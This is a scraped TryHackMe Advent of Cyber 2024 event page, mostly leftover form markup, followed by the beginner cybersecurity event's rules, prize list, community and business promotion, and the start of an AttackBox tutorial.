<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="5" name="5" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="6" name="6" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="7" name="7" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="1" name="1" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button><button color="hint" type="button" role="button" class="sc-kAyceB dtlBUx sc-beSSEr epJuEK"><svg
aria-hidden="true" focusable="false" data-prefix="far" data-icon="lightbulb" class="svg-inline--fa fa-lightbulb " role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 384 512">
<path fill="currentColor"
d="M112.1 454.3c0 6.297 1.816 12.44 5.284 17.69l17.14 25.69c5.25 7.875 17.17 14.28 26.64 14.28h61.67c9.438 0 21.36-6.401 26.61-14.28l17.08-25.68c2.938-4.438 5.348-12.37 5.348-17.7L272 415.1h-160L112.1 454.3zM192 0C90.02 .3203 16 82.97 16 175.1c0 44.38 16.44 84.84 43.56 115.8c16.53 18.84 42.34 58.23 52.22 91.45c.0313 .25 .0938 .5166 .125 .7823h160.2c.0313-.2656 .0938-.5166 .125-.7823c9.875-33.22 35.69-72.61 52.22-91.45C351.6 260.8 368 220.4 368 175.1C368 78.8 289.2 .0039 192 0zM288.4 260.1c-15.66 17.85-35.04 46.3-49.05 75.89h-94.61c-14.01-29.59-33.39-58.04-49.04-75.88C75.24 236.8 64 206.1 64 175.1C64 113.3 112.1 48.25 191.1 48C262.6 48 320 105.4 320 175.1C320 206.1 308.8 236.8 288.4 260.1zM176 80C131.9 80 96 115.9 96 160c0 8.844 7.156 16 16 16S128 168.8 128 160c0-26.47 21.53-48 48-48c8.844 0 16-7.148 16-15.99S184.8 80 176 80z">
</path>
</svg>Hint</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="2" name="2" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="3" name="3" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form><form data-sentry-element="StyledForm" data-sentry-source-file="question-and-answer-item.tsx" class="sc-kBpyjw xLYZN">
<div data-sentry-element="StyledTextfieldContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-hEUNDx duKYkS">
<div class="sc-kYxDKI iaxtnO">
<div class="sc-gEvEer sc-hCPjZK dUlYmO ipdJds"><input id="4" name="4" data-testid="answer-field" autocomplete="off" placeholder="Login to answer.." class="sc-bbSZdi jnxbY" value="" disabled=""></div>
</div>
</div>
<div data-sentry-element="StyledButtonsContainer" data-sentry-source-file="question-and-answer-item.tsx" class="sc-ebnDkq iUSxdj"><button color="add" type="submit" role="button" data-sentry-element="StyledButton"
data-sentry-source-file="question-and-answer-item.tsx" class="sc-kAyceB bWrVDc sc-beSSEr sc-iOjliw epJuEK iwatXM">Login to answer..</button></div>
</form>Text Content
You need to enable JavaScript to run this app.
* Learn
* Compete
* For Education
* For Business
* Pricing
Learn
Compete
For Education
For Business
Pricing
Log In
Join for FREE
Log In
Join for FREE
* Learn
* Advent of Cyber 2024
ADVENT OF CYBER 2024
Dive into the wonderful world of cyber security by engaging in festive
beginner-friendly exercises every day in the lead-up to Christmas!
easy
1440 min
Share the challengeHelp
6292
Room progress ( 0% )
To access material, start machines and answer questions login.
Advent of Cyber - Day 5: Exploiting XXE in Web Apps! •
Source: YouTube
Task 1Introduction Welcome to Advent of Cyber 2024
WELCOME TO ADVENT OF CYBER 2024!
In this year’s Advent of Cyber, can you help McSkidy and the Glitch defend
SOC-mas against the evil Mayor Malware’s plans?
Dive into the wonderful world of cyber security by engaging in festive
beginner-friendly exercises every day in the lead-up to Christmas!
Advent of Cyber is available to all TryHackMe users, and best of all, it's free
to participate in. You’ll also be in with the chance of winning from this year’s
huge $100,000 prize draw. The more questions you complete, the higher your
chances of winning BIG!
Think of it like an advent calendar, but with exciting (and festive) security
challenges instead of chocolate.
MAIN PRIZES
This year is our biggest and best prize draw yet, with over $100,000 worth of
prizes!
In this event, the number of questions you answer really matters! For each
question you answer correctly, you'll receive a raffle ticket. The more raffle
tickets you collect, the higher your chances of winning big!
To be in with the chance of winning the grand prize of DEF CON tickets with
accommodation, you’ll need to complete every task in this room by December 31st!
This will also earn you a certificate of completion.
Here are the prizes up for grabs:
15x Samsung Monitor ($300.00) 7x GRID Backpack ($225.00) 20x JBL Headphones
($130.00) 15x Branded Cotton Canvas Backpack ($65.00) 4x Sony Headphones
($450.00) 3x PAC-MAN™ Deluxe Arcade Game ($500.00) 5x Desk Chair ($249.00) 20x
Large Arlo Tech Organizer ($70.00) 20x The Sidekick Tech Kit ($50.00) 15x
Branded Apple AirPods Pro (2nd Gen) ($300.00) 10x Apple TV 4K 64GB (3rd
generation) ($149.00) 10x Personalized Catch:3 Classics, Italian Leather
($190.00) 15x Clutch® Pro USB-C for Android and iPhone 15+ ($50.00) 500x THM
Subscription (1 Month) ($14.00) 5x Stilosa 15 Bar Pump Espresso Machine
($150.00) 300x THM Subscription (3 Months) ($42.00) 5x Infinity Game Board™
($500.00) 25x THM Subscription (6 Months) ($84.00) 20x Branded MagSafe Charger
($45.00) 5x THM Subscription (12 Months) ($126.00) 5x Duo Standing Desk
($499.00) 400x TryHackMe Swag Gift Cards ($10.00) 10x Nintendo Switch 32GB Lite
($250.00) 300x TryHackMe Swag Gift Cards ($20.00) 3x Switch OLED Model w/ Neon
Red & Neon Blue Joy-Con ($420.00) 150x TryHackMe Swag Gift Cards ($50) ($50.00)
10x Solar Charger and Emergency Radio ($50.00) 80x TryHackMe Swag Gift Cards
($75) ($75.00) 2x PlayStation VR2 ($600.00) 20x TryHackMe Swag Gift Cards ($100)
($100.00) 5x Beosound Explore Outdoor Bluetooth Speaker ($249.00) 200x
Hacktivities Cards ($20.00) 10x Therabody SmartGoggles ($199.00) 5x DEF CON
($460.00) 10x Ornata V3 Full-Size Wired Mecha-Membrane Gaming Keyboard with
Chroma RGB Backlighting ($79.00) GRAND PRIZE: 3x DEF CON + Accommodation
($1,500.00)
All winners will be chosen at random, verified by our team (no cheating
allowed!), and announced on Monday, January 6th, 2025.
GENERAL RULES
Breaking any of the following rules will result in elimination from the event:
* .tryhackme.com and the OpenVPN server are off-limits to probing, scanning, or
exploiting
* Users are only authorised to hack machines deployed in the rooms they have
access to
* Users are not to target or attack other users
* Users should only enter the event once, using one account
* Answers to questions are not to be shared unless shown on videos/streams
* Cheating
* Usage of bot accounts
For the prize raffle terms and conditions, please visit this page.
Please note: Cheating is NOT allowed and will result in a disqualification from
the Advent of Cyber event. All winners will be fully verified. This includes, in
particular:
* creating puppet accounts to inflate your chance to win
* using bots to auto-complete the answers in the room
HOW TO QUALIFY
To qualify for the main prizes, you must answer questions in the Advent of Cyber
2024 challenges, starting with Day 1 (Task 7 of this room). Only questions
answered in the Advent of Cyber 2024 room will qualify you for the raffle.
* It doesn't matter when you complete tasks. You just need to complete them by
31st December 2024. For example, if you complete questions from Day 1 on 31st
December 2024, you will still receive the same amount of raffle tickets as a
user who completes on the day of the task release!
* You don't have to complete all the questions or complete them in order. The
more questions you answer, the more raffle tickets you get and the higher
your chances of winning.
* Please visit this page to read the detailed Raffle Terms and Conditions.
IMPORTANT NOTE: The raffle tickets will not be visible on your profile. The
number of raffle tickets you have always equals the number of questions you
answer in this room.
CERTIFICATE & BADGE
Finally, if you complete every task in the event, you will earn a certificate of
completion and a badge! As your name will be included on the certificate, we
advise ensuring your full name is set (and updated) in your profile.
FEATURED VIDEOS
Each task released has a supporting video walkthrough to guide you through. You
can expect to see some of your favourite cyber security video creators. The most
recent day’s video will display at the top of the room, but all videos will be
available within the relevant task content.
This year's Advent of Cyber featured creators include 0day, UnixGuy, Gerald
Auger, Tyler Ramsbey, Bearded I.T. Dad, Day Cyberwox, Marcus Hutchins, David
Alves, InsiderPHD, Tib3rius, KevTech, Cyb3rMaddy, and more!
Answer the questions below
I have read the rules and raffle Terms and Conditions.
Login to answer..
Task 2Introduction Join our community
JOIN OUR COMMUNITY
Follow us on social media for exclusive giveaways, Advent of Cyber task
releases, and our prize draw announcement!
Follow us on LinkedIn!
Be a part of our community and join our Discord!
Follow us on X to receive daily challenge posts!
Join us on Instagram!
Follow us on Facebook!
Join our growing subreddit!
Follow our TikToks!
JOIN OUR DISCORD
Discord is the heartbeat of the TryHackMe community. It's where we go to connect
with fellow hackers, get help with difficult rooms, and find out when a new room
launches. Our Discord server has over 220,000 members (and continues to grow
every day), so there's always something happening.
Are you excited about Advent of Cyber? Visit a dedicated channel on our Discord,
where you can chat with other participants in the event and follow the daily
releases!
If you haven't used it before, it's very easy to set up (we recommend installing
the app). We'll ask a couple of onboarding questions to help figure out which
channels are most relevant to you.
WHAT DO YOU GET WITH DISCORD?
There are so many benefits to joining:
* Discuss the day's Advent of Cyber challenges and receive support in a
dedicated channel.
* Discover how to improve your job applications and fast-track your way into a
cyber career.
* Learn about upcoming TryHackMe events and challenges.
* Browse discussion forums for all of our learning paths and releases.
Click on this link to join our Discord Server: Join the Community!
GRAB YOUR SWAG!
Want to rep swag from your favourite cyber security training platform? We have a
NEW special edition Advent of Cyber swag, now available for order!
Answer the questions below
Join our Discord and say hi!
Login to answer..
Is there a dedicated Advent of Cyber channel on TryHackMe Discord where users
can discuss daily challenges and receive dedicated support? (yes/no)
Login to answer..
Follow us on LinkedIn!
Login to answer..
Follow us on X!
Login to answer..
Check out the subreddit!
Login to answer..
Join us on Instagram!
Login to answer..
Follow us on Facebook!
Login to answer..
Follow our TikToks!
Login to answer..
Task 3Introduction Completing Advent of Cyber as an organisation
COMPLETING ADVENT OF CYBER AS AN ORGANISATION
With TryHackMe for Business, you:
* Get full unlimited access to all of TryHackMe's content and features
(excluding cloud content and SOC Sim)
* Leverage competitive learning and collectively engage your team in Advent of
Cyber tasks, measuring their progress
* Create customised learning paths to dive into training topics based on Advent
of Cyber and beyond
* Training for Defensive, Offensive, and Cloud Security teams
* Advanced admin reports and dashboards
* Implementation support for your organisation, SSO integration, and Customer
Success Manager
* Build your own custom capture-the-flag events on demand!
If you're interested in exploring TryHackMe's business benefits through a FREE
trial, please contact sales@tryhackme.com. For more information about our
offering, check out the business page.
If you’re an existing client and want to get your wider team and company
involved, please reach out to your dedicated Customer Success Manager!
Answer the questions below
Get your team to work on Advent of Cyber together!
Login to answer..
Task 4Introduction How to use TryHackMe
A SHORT TRYHACKME TUTORIAL
New tasks are released daily at 4pm GMT, with the first challenge being released
on 1st December. They will vary in difficulty (although they will always be
aimed at beginners). Each task in the event will include instructions on how to
interact with the practical material. Please follow them carefully! The
instructions will include a connection card similar to the one shown below:
Let's work our way through the different options.
If the AttackBox option is available:
TryHackMe's AttackBox is an Ubuntu Virtual Machine hosted in the cloud. Think of
the AttackBox as your virtual computer, which you would use to conduct a
security engagement. There will be multiple tasks during the event that will ask
you to deploy the AttackBox.
You can deploy the AttackBox by clicking the "Start AttackBox" button at the top
of this page.
Using the web-based AttackBox, you can complete exercises through your browser.
If you're a regular user, you can deploy the AttackBox for free for 1 hour a
day. If you're subscribed, you can deploy it for an unlimited amount of time!
